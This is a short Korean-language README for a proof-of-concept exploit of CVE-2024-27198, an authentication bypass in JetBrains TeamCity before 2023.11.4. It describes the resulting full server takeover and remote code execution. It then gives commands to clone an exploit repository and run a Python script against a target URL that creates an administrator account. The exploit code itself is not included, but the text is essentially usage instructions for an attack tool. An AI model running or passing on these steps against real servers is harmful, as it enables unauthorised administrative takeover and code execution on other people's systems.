
PoC about CVE-2024-27198
JetBrains TeamCity 2023.11.4 이전 버전에서 인증 우회 취약점이 존재하여 TeamCity 서버에서 관리자 작업을 수행할 수 있습니다. 공격자는 모든 TeamCity 프로젝트, 빌드, 에이전트 및 아티팩트를 완전히 제어할 수 있으며, 최종적으로 원격 코드 실행(RCE)이 가능합니다.
git clone https://github.com/jrbH4CK/CVE-2024-27198.git
cd CVE-2024-27198
서버 내에서 관리자 권한으로 계정을 생성하려면
python3 cve-2024-27198.py http://example.com username password

